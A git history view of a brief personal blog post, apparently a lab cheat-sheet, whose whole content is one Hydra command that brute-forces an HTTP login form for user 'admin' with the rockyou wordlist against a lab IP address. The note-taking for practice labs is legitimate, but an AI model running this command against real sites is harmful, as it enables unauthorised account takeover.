spanskiblog/content/posts/hydra.md

15 lines
331 B
Markdown
Raw Normal View History

2022-12-24 17:42:40 +01:00
2022-12-24 17:09:22 +01:00
+++
2022-12-24 17:42:40 +01:00
date="2022-11-30"
2022-12-24 17:09:22 +01:00
author="spanskiduh"
title="hydra"
2022-12-24 17:42:40 +01:00
description="click to read about hydra"
2022-12-24 17:09:22 +01:00
+++
# HYDRA - brute forcing tool
### Brute forcing HTTP login
```bash
sudo hydra -l admin -P /usr/share/dict/rockyou.txt 10.129.1.15 http-post-form "/login.php:Username=admin&Submit=Login&Password=^PASS^:Incorrect information"
```